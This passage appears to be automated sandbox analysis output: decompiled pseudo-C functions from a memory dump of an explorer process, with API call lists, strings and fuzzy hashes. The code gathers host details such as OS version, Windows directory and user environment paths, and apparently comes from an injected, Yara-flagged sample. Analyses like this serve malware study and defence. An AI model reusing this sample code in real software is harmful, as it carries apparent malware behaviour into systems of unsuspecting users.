                                                                                                                                                                                              							L48:
                                                                                                                                                                                              							_t324 = _v40;
                                                                                                                                                                                              							goto L49;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t247 = _v28;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                                              						goto L42;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t262 = _v32;
                                                                                                                                                                                              					goto L48;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					E02F88BF4( &_v36, _t322);
                                                                                                                                                                                              					_t320 = _v36;
                                                                                                                                                                                              					goto L53;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x02f8eb6b
                                                                                                                                                                                              0x02f8eb6e
                                                                                                                                                                                              0x02f8eb71
                                                                                                                                                                                              0x02f8eb74
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eb7a
                                                                                                                                                                                              0x02f8eb88
                                                                                                                                                                                              0x02f8eb8b
                                                                                                                                                                                              0x02f8eb8d
                                                                                                                                                                                              0x02f8eba6
                                                                                                                                                                                              0x02f8ebb5
                                                                                                                                                                                              0x02f8ebbd
                                                                                                                                                                                              0x02f8ebbd
                                                                                                                                                                                              0x02f8ebc0
                                                                                                                                                                                              0x02f8ebc7
                                                                                                                                                                                              0x02f8ebcb
                                                                                                                                                                                              0x02f8ebd1
                                                                                                                                                                                              0x02f8ebd3
                                                                                                                                                                                              0x02f8ee43
                                                                                                                                                                                              0x02f8ee49
                                                                                                                                                                                              0x02f8ee4f
                                                                                                                                                                                              0x02f8ee52
                                                                                                                                                                                              0x02f8ee52
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ee52
                                                                                                                                                                                              0x02f8ebe2
                                                                                                                                                                                              0x02f8ebf6
                                                                                                                                                                                              0x02f8ebfa
                                                                                                                                                                                              0x02f8ebfc
                                                                                                                                                                                              0x02f8ec01
                                                                                                                                                                                              0x02f8ee10
                                                                                                                                                                                              0x02f8ee16
                                                                                                                                                                                              0x02f8ee21
                                                                                                                                                                                              0x02f8ee2c
                                                                                                                                                                                              0x02f8ee32
                                                                                                                                                                                              0x02f8ee38
                                                                                                                                                                                              0x02f8ee3b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ee3b
                                                                                                                                                                                              0x02f8ec07
                                                                                                                                                                                              0x02f8edde
                                                                                                                                                                                              0x02f8edde
                                                                                                                                                                                              0x02f8ede1
                                                                                                                                                                                              0x02f8ede4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ec0f
                                                                                                                                                                                              0x02f8ec17
                                                                                                                                                                                              0x02f8ec1e
                                                                                                                                                                                              0x02f8ec24
                                                                                                                                                                                              0x02f8ec26
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ec2f
                                                                                                                                                                                              0x02f8ec44
                                                                                                                                                                                              0x02f8ec4a
                                                                                                                                                                                              0x02f8ec53
                                                                                                                                                                                              0x02f8ec56
                                                                                                                                                                                              0x02f8ec59
                                                                                                                                                                                              0x02f8ec5b
                                                                                                                                                                                              0x02f8edd1
                                                                                                                                                                                              0x02f8edd4
                                                                                                                                                                                              0x02f8eddd
                                                                                                                                                                                              0x02f8eddd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eddd
                                                                                                                                                                                              0x02f8ec6b
                                                                                                                                                                                              0x02f8ec6e
                                                                                                                                                                                              0x02f8ec75
                                                                                                                                                                                              0x02f8ec7b
                                                                                                                                                                                              0x02f8ec7e
                                                                                                                                                                                              0x02f8ec81
                                                                                                                                                                                              0x02f8ec84
                                                                                                                                                                                              0x02f8ec87
                                                                                                                                                                                              0x02f8ecc3
                                                                                                                                                                                              0x02f8ecc3
                                                                                                                                                                                              0x02f8ecc6
                                                                                                                                                                                              0x02f8ed72
                                                                                                                                                                                              0x02f8ed86
                                                                                                                                                                                              0x02f8ed96
                                                                                                                                                                                              0x02f8ed9a
                                                                                                                                                                                              0x02f8ed9c
                                                                                                                                                                                              0x02f8edb3
                                                                                                                                                                                              0x02f8edb7
                                                                                                                                                                                              0x02f8edc0
                                                                                                                                                                                              0x02f8edcb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8edcb
                                                                                                                                                                                              0x02f8eda2
                                                                                                                                                                                              0x02f8eda3
                                                                                                                                                                                              0x02f8eda8
                                                                                                                                                                                              0x02f8eda8
                                                                                                                                                                                              0x02f8edaa
                                                                                                                                                                                              0x02f8edab
                                                                                                                                                                                              0x02f8edb0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8edb0
                                                                                                                                                                                              0x02f8eccc
                                                                                                                                                                                              0x02f8eccc
                                                                                                                                                                                              0x02f8eccf
                                                                                                                                                                                              0x02f8ed3a
                                                                                                                                                                                              0x02f8ed4e
                                                                                                                                                                                              0x02f8ed5e
                                                                                                                                                                                              0x02f8ed62
                                                                                                                                                                                              0x02f8ed64
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ed6a
                                                                                                                                                                                              0x02f8ed6b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ed6b
                                                                                                                                                                                              0x02f8ecd1
                                                                                                                                                                                              0x02f8ecd1
                                                                                                                                                                                              0x02f8ecd4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ecd6
                                                                                                                                                                                              0x02f8ecd9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ecdb
                                                                                                                                                                                              0x02f8ecdb
                                                                                                                                                                                              0x02f8ece1
                                                                                                                                                                                              0x02f8ecfd
                                                                                                                                                                                              0x02f8ed0c
                                                                                                                                                                                              0x02f8ed15
                                                                                                                                                                                              0x02f8ed1a
                                                                                                                                                                                              0x02f8ed1d
                                                                                                                                                                                              0x02f8ed23
                                                                                                                                                                                              0x02f8ed23
                                                                                                                                                                                              0x02f8ed28
                                                                                                                                                                                              0x02f8ed34
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ed34
                                                                                                                                                                                              0x02f8ece6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ece6
                                                                                                                                                                                              0x02f8ec89
                                                                                                                                                                                              0x02f8ecb0

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F8E400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E413
                                                                                                                                                                                                • Part of subcall function 02F8E400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E424
                                                                                                                                                                                                • Part of subcall function 02F8E400: CoCreateInstance.OLE32(02F9C868,00000000,00000001,02F9C878,?,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E43B
                                                                                                                                                                                                • Part of subcall function 02F8E400: SysAllocString.OLEAUT32(00000000), ref: 02F8E446
                                                                                                                                                                                                • Part of subcall function 02F8E400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E471
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8EAF3
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8EB07
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8EE90
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8EE99
                                                                                                                                                                                                • Part of subcall function 02F88BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 02F88C3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                              • String ID: FALSE$TRUE
                                                                                                                                                                                              • API String ID: 1290676130-1412513891
                                                                                                                                                                                              • Opcode ID: 5c73c0cdd4d9e9b6bfaec70fde637b4c483f2ffc3db0d450fd3de34118d7f30e
                                                                                                                                                                                              • Instruction ID: 7cf5e28562f0d64c3d19d3c2860de64dbd4a2231fbb496fa3b47757690bfdda6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c73c0cdd4d9e9b6bfaec70fde637b4c483f2ffc3db0d450fd3de34118d7f30e
                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E13F72E00219AFDB14EFA4CC94EAEFBB9FF48780F144459E616A7250DB71A905CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                              			E02F8DF3D(void* __fp0) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v144;
                                                                                                                                                                                              				char _v656;
                                                                                                                                                                                              				char _v668;
                                                                                                                                                                                              				char _v2644;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				struct _OSVERSIONINFOA* _t68;
                                                                                                                                                                                              				intOrPtr _t70;
                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				intOrPtr _t87;
                                                                                                                                                                                              				intOrPtr _t89;
                                                                                                                                                                                              				void* _t90;
                                                                                                                                                                                              				intOrPtr _t92;
                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                              				void* _t97;
                                                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                                                              				short _t106;
                                                                                                                                                                                              				char _t108;
                                                                                                                                                                                              				intOrPtr _t113;
                                                                                                                                                                                              				intOrPtr _t116;
                                                                                                                                                                                              				intOrPtr _t119;
                                                                                                                                                                                              				intOrPtr _t123;
                                                                                                                                                                                              				intOrPtr _t136;
                                                                                                                                                                                              				intOrPtr _t138;
                                                                                                                                                                                              				intOrPtr _t141;
                                                                                                                                                                                              				intOrPtr _t143;
                                                                                                                                                                                              				intOrPtr _t148;
                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                              				WCHAR* _t150;
                                                                                                                                                                                              				char* _t151;
                                                                                                                                                                                              				intOrPtr _t162;
                                                                                                                                                                                              				intOrPtr _t177;
                                                                                                                                                                                              				void* _t191;
                                                                                                                                                                                              				struct _OSVERSIONINFOA* _t192;
                                                                                                                                                                                              				void* _t193;
                                                                                                                                                                                              				void* _t195;
                                                                                                                                                                                              				char _t198;
                                                                                                                                                                                              				void* _t199;
                                                                                                                                                                                              				char* _t200;
                                                                                                                                                                                              				void* _t203;
                                                                                                                                                                                              				int* _t204;
                                                                                                                                                                                              				void* _t216;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t216 = __fp0;
                                                                                                                                                                                              				_t148 =  *0x2f9f830; // 0x2f80000
                                                                                                                                                                                              				_t68 = E02F88BDE(0x1ac4);
                                                                                                                                                                                              				_t192 = _t68;
                                                                                                                                                                                              				if(_t192 != 0) {
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                                              					_t70 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
                                                                                                                                                                                              					_t3 = _t192 + 0x648; // 0x648
                                                                                                                                                                                              					E02F93548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
                                                                                                                                                                                              					_t73 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_t5 = _t192 + 0x1644; // 0x1644
                                                                                                                                                                                              					_t194 = _t5;
                                                                                                                                                                                              					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
                                                                                                                                                                                              					_t207 = _t74;
                                                                                                                                                                                              					if(_t74 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)(_t192 + 0x1854)) = E02F895F3(_t194, _t207);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t75 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_t77 = E02F8C879( *((intOrPtr*)(_t75 + 0x12c))());
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
                                                                                                                                                                                              					_t159 =  *_t77;
                                                                                                                                                                                              					if(E02F8C9F4( *_t77) == 0) {
                                                                                                                                                                                              						_t79 = E02F8C8C9(_t159, _t194);
                                                                                                                                                                                              						__eflags = _t79;
                                                                                                                                                                                              						_t162 = (0 | _t79 > 0x00000000) + 1;
                                                                                                                                                                                              						__eflags = _t162;
                                                                                                                                                                                              						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						 *((intOrPtr*)(_t192 + 0x214)) = 3;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t14 = _t192 + 0x220; // 0x220
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x218)) = E02F8F3A3(_t14);
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x21c)) = E02F8F368(_t14);
                                                                                                                                                                                              					_t17 = _t192 + 0x114; // 0x114
                                                                                                                                                                                              					_t195 = _t17;
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
                                                                                                                                                                                              					_push( &_v16);
                                                                                                                                                                                              					_v12 = 0x80;
                                                                                                                                                                                              					_push( &_v8);
                                                                                                                                                                                              					_v8 = 0x100;
                                                                                                                                                                                              					_push( &_v656);
                                                                                                                                                                                              					_push( &_v12);
                                                                                                                                                                                              					_push(_t195);
                                                                                                                                                                                              					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
                                                                                                                                                                                              					_t87 =  *0x2f9f820; // 0x508f8b8
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t89 =  *0x2f9f828; // 0x508f838
                                                                                                                                                                                              					_t90 =  *((intOrPtr*)(_t89 + 0x3c))(0x1000);
                                                                                                                                                                                              					_t28 = _t192 + 0x228; // 0x228
                                                                                                                                                                                              					_t149 = _t28;
                                                                                                                                                                                              					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
                                                                                                                                                                                              					E02F8DF36(_t149);
                                                                                                                                                                                              					_t211 = _t149;
                                                                                                                                                                                              					if(_t149 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)(_t192 + 0x434)) = E02F895F3(_t149, _t211);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t92 = E02F8C6CE();
                                                                                                                                                                                              					_t33 = _t192 + 0xb0; // 0xb0
                                                                                                                                                                                              					_t196 = _t33;
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
                                                                                                                                                                                              					_t93 = E02F8C4C1(_t92, _t33, _t211, _t216);
                                                                                                                                                                                              					_t35 = _t192 + 0xd0; // 0xd0
                                                                                                                                                                                              					E02F899DF(_t93, _t33, _t35);
                                                                                                                                                                                              					_t36 = _t192 + 0x438; // 0x438
                                                                                                                                                                                              					E02F8960D(_t149, _t36);
                                                                                                                                                                                              					_t97 = E02F8E2C5(_t196, E02F8A43D(_t33), 0);
                                                                                                                                                                                              					_t37 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                                              					E02F8C6E4(_t97, _t37, _t216);
                                                                                                                                                                                              					_t99 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x101c)) = E02F8CA46( *((intOrPtr*)(_t99 + 0x12c))(_t195));
                                                                                                                                                                                              					E02F88D6D(_t192, 0, 0x9c);
                                                                                                                                                                                              					_t204 = _t203 + 0xc;
                                                                                                                                                                                              					_t192->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                              					GetVersionExA(_t192);
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0xa8)) = E02F8DD39(_t100);
                                                                                                                                                                                              					_t106 = E02F8DD62(_t105);
                                                                                                                                                                                              					_t41 = _t192 + 0x1020; // 0x1020
                                                                                                                                                                                              					_t150 = _t41;
                                                                                                                                                                                              					 *((short*)(_t192 + 0x9c)) = _t106;
                                                                                                                                                                                              					GetWindowsDirectoryW(_t150, 0x104);
                                                                                                                                                                                              					_t108 = E02F89DF2(_t105, 0x9cf);
                                                                                                                                                                                              					_t177 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_t198 = _t108;
                                                                                                                                                                                              					 *_t204 = 0x104;
                                                                                                                                                                                              					_push( &_v668);
                                                                                                                                                                                              					_push(_t198);
                                                                                                                                                                                              					_v8 = _t198;
                                                                                                                                                                                              					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
                                                                                                                                                                                              						_t143 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E02F88BAF( &_v8);
                                                                                                                                                                                              					_t113 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_t48 = _t192 + 0x1434; // 0x1434
                                                                                                                                                                                              					_t199 = _t48;
                                                                                                                                                                                              					 *_t204 = 0x209;
                                                                                                                                                                                              					_push(_t199);
                                                                                                                                                                                              					_push(L"USERPROFILE");
                                                                                                                                                                                              					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
                                                                                                                                                                                              						E02F89E51(_t199, 0x105, L"%s\\%s", _t150);
                                                                                                                                                                                              						_t141 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              						_t204 =  &(_t204[5]);
                                                                                                                                                                                              						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0x20a);
                                                                                                                                                                                              					_t51 = _t192 + 0x122a; // 0x122a
                                                                                                                                                                                              					_t151 = L"TEMP";
                                                                                                                                                                                              					_t116 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_push(_t151);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
                                                                                                                                                                                              						_t138 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0x40);
                                                                                                                                                                                              					_t200 = L"SystemDrive";
                                                                                                                                                                                              					_push( &_v144);
                                                                                                                                                                                              					_t119 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_push(_t200);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
                                                                                                                                                                                              						_t136 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v8 = 0x7f;
                                                                                                                                                                                              					_t59 = _t192 + 0x199c; // 0x199c
                                                                                                                                                                                              					_t123 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
                                                                                                                                                                                              					_t62 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                                              					E02F93548(E02F8E2C5(_t62, E02F8A43D(_t62), 0),  &_v2644);
                                                                                                                                                                                              					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                                                                                                              					E02F9351A( &_v2644, _t63, 0x20);
                                                                                                                                                                                              					_push( &_v2644);
                                                                                                                                                                                              					_push(0x1e);
                                                                                                                                                                                              					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                                                                                                              					_t191 = 0x14;
                                                                                                                                                                                              					E02F896DA(_t66, _t191);
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x1898)) = E02F8DAE3(_t191);
                                                                                                                                                                                              					return _t192;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t68;
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x02f8e01a
                                                                                                                                                                                              0x02f8e023
                                                                                                                                                                                              0x02f8e029
                                                                                                                                                                                              0x02f8e02d
                                                                                                                                                                                              0x02f8e034
                                                                                                                                                                                              0x02f8e03b
                                                                                                                                                                                              0x02f8e042
                                                                                                                                                                                              0x02f8e046
                                                                                                                                                                                              0x02f8e04d
                                                                                                                                                                                              0x02f8e04e
                                                                                                                                                                                              0x02f8e050
                                                                                                                                                                                              0x02f8e055
                                                                                                                                                                                              0x02f8e05c
                                                                                                                                                                                              0x02f8e05e
                                                                                                                                                                                              0x02f8e05e
                                                                                                                                                                                              0x02f8e064
                                                                                                                                                                                              0x02f8e06e
                                                                                                                                                                                              0x02f8e073
                                                                                                                                                                                              0x02f8e073
                                                                                                                                                                                              0x02f8e080
                                                                                                                                                                                              0x02f8e086
                                                                                                                                                                                              0x02f8e08b
                                                                                                                                                                                              0x02f8e08d
                                                                                                                                                                                              0x02f8e096
                                                                                                                                                                                              0x02f8e096
                                                                                                                                                                                              0x02f8e09e
                                                                                                                                                                                              0x02f8e0a3
                                                                                                                                                                                              0x02f8e0a3
                                                                                                                                                                                              0x02f8e0a9
                                                                                                                                                                                              0x02f8e0b4
                                                                                                                                                                                              0x02f8e0b9
                                                                                                                                                                                              0x02f8e0c1
                                                                                                                                                                                              0x02f8e0c7
                                                                                                                                                                                              0x02f8e0cf
                                                                                                                                                                                              0x02f8e0e1
                                                                                                                                                                                              0x02f8e0e7
                                                                                                                                                                                              0x02f8e0ef
                                                                                                                                                                                              0x02f8e0f4
                                                                                                                                                                                              0x02f8e112
                                                                                                                                                                                              0x02f8e118
                                                                                                                                                                                              0x02f8e11d
                                                                                                                                                                                              0x02f8e120
                                                                                                                                                                                              0x02f8e123
                                                                                                                                                                                              0x02f8e130
                                                                                                                                                                                              0x02f8e136
                                                                                                                                                                                              0x02f8e140
                                                                                                                                                                                              0x02f8e140
                                                                                                                                                                                              0x02f8e146
                                                                                                                                                                                              0x02f8e14e
                                                                                                                                                                                              0x02f8e159
                                                                                                                                                                                              0x02f8e15e
                                                                                                                                                                                              0x02f8e164
                                                                                                                                                                                              0x02f8e166
                                                                                                                                                                                              0x02f8e173
                                                                                                                                                                                              0x02f8e174
                                                                                                                                                                                              0x02f8e175
                                                                                                                                                                                              0x02f8e180
                                                                                                                                                                                              0x02f8e182
                                                                                                                                                                                              0x02f8e189
                                                                                                                                                                                              0x02f8e189
                                                                                                                                                                                              0x02f8e193
                                                                                                                                                                                              0x02f8e198
                                                                                                                                                                                              0x02f8e19d
                                                                                                                                                                                              0x02f8e19d
                                                                                                                                                                                              0x02f8e1a3
                                                                                                                                                                                              0x02f8e1aa
                                                                                                                                                                                              0x02f8e1ab
                                                                                                                                                                                              0x02f8e1b8
                                                                                                                                                                                              0x02f8e1cb
                                                                                                                                                                                              0x02f8e1d0
                                                                                                                                                                                              0x02f8e1d5
                                                                                                                                                                                              0x02f8e1de
                                                                                                                                                                                              0x02f8e1de
                                                                                                                                                                                              0x02f8e1e4
                                                                                                                                                                                              0x02f8e1e9
                                                                                                                                                                                              0x02f8e1ef
                                                                                                                                                                                              0x02f8e1f5
                                                                                                                                                                                              0x02f8e1fa
                                                                                                                                                                                              0x02f8e203
                                                                                                                                                                                              0x02f8e205
                                                                                                                                                                                              0x02f8e20c
                                                                                                                                                                                              0x02f8e20c
                                                                                                                                                                                              0x02f8e212
                                                                                                                                                                                              0x02f8e21a
                                                                                                                                                                                              0x02f8e21f
                                                                                                                                                                                              0x02f8e220
                                                                                                                                                                                              0x02f8e225
                                                                                                                                                                                              0x02f8e22e
                                                                                                                                                                                              0x02f8e230
                                                                                                                                                                                              0x02f8e23b
                                                                                                                                                                                              0x02f8e23b
                                                                                                                                                                                              0x02f8e244
                                                                                                                                                                                              0x02f8e24c
                                                                                                                                                                                              0x02f8e253
                                                                                                                                                                                              0x02f8e258
                                                                                                                                                                                              0x02f8e267
                                                                                                                                                                                              0x02f8e27f
                                                                                                                                                                                              0x02f8e286
                                                                                                                                                                                              0x02f8e294
                                                                                                                                                                                              0x02f8e29f
                                                                                                                                                                                              0x02f8e2a0
                                                                                                                                                                                              0x02f8e2a4
                                                                                                                                                                                              0x02f8e2aa
                                                                                                                                                                                              0x02f8e2ab
                                                                                                                                                                                              0x02f8e2b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8e2c0
                                                                                                                                                                                              0x02f8e2c4

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02F8DF64
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02F8E05E
                                                                                                                                                                                              • GetVersionExA.KERNEL32(00000000), ref: 02F8E123
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 02F8E14E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateCurrentDirectoryErrorHeapLastProcessVersionWindows
                                                                                                                                                                                              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                              • API String ID: 3743117707-2706916422
                                                                                                                                                                                              • Opcode ID: 60c5019018b0c890a8df25c289da1bfa876fe33f40d1f5b69566e74654fa1972
                                                                                                                                                                                              • Instruction ID: 817733fc2249971b847bc3966817e30574a608e69239be67f75fd4aca931ddde
                                                                                                                                                                                              • Opcode Fuzzy Hash: 60c5019018b0c890a8df25c289da1bfa876fe33f40d1f5b69566e74654fa1972
                                                                                                                                                                                              • Instruction Fuzzy Hash: 11917F71B40605ABE704FB74DC49FEAF7E9BF08780F00466AE61AD7240DB70A9558FA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                              			E02F8D447(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                                              				struct HINSTANCE__* _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				struct HINSTANCE__* _v28;
                                                                                                                                                                                              				short _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr* _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				struct HINSTANCE__* _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				struct HINSTANCE__* _v53;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				short _v68;
                                                                                                                                                                                              				struct _WNDCLASSEXA _v116;
                                                                                                                                                                                              				char _t81;
                                                                                                                                                                                              				intOrPtr* _t83;
                                                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                                                              				intOrPtr _t87;
                                                                                                                                                                                              				intOrPtr _t90;
                                                                                                                                                                                              				intOrPtr _t95;
                                                                                                                                                                                              				char _t97;
                                                                                                                                                                                              				short _t98;
                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                              				void* _t107;
                                                                                                                                                                                              				intOrPtr _t110;
                                                                                                                                                                                              				intOrPtr _t113;
                                                                                                                                                                                              				char _t119;
                                                                                                                                                                                              				void* _t124;
                                                                                                                                                                                              				struct HWND__* _t132;
                                                                                                                                                                                              				struct HINSTANCE__* _t138;
                                                                                                                                                                                              				intOrPtr _t145;
                                                                                                                                                                                              				void* _t147;
                                                                                                                                                                                              				char _t154;
                                                                                                                                                                                              				intOrPtr _t155;
                                                                                                                                                                                              				intOrPtr _t157;
                                                                                                                                                                                              				intOrPtr _t158;
                                                                                                                                                                                              				intOrPtr _t160;
                                                                                                                                                                                              				intOrPtr _t162;
                                                                                                                                                                                              				char _t163;
                                                                                                                                                                                              				void* _t165;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t81 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              				_t138 = 0;
                                                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                                                              				_t157 = __edx;
                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                              				_v52 = 0;
                                                                                                                                                                                              				_v48 = 0;
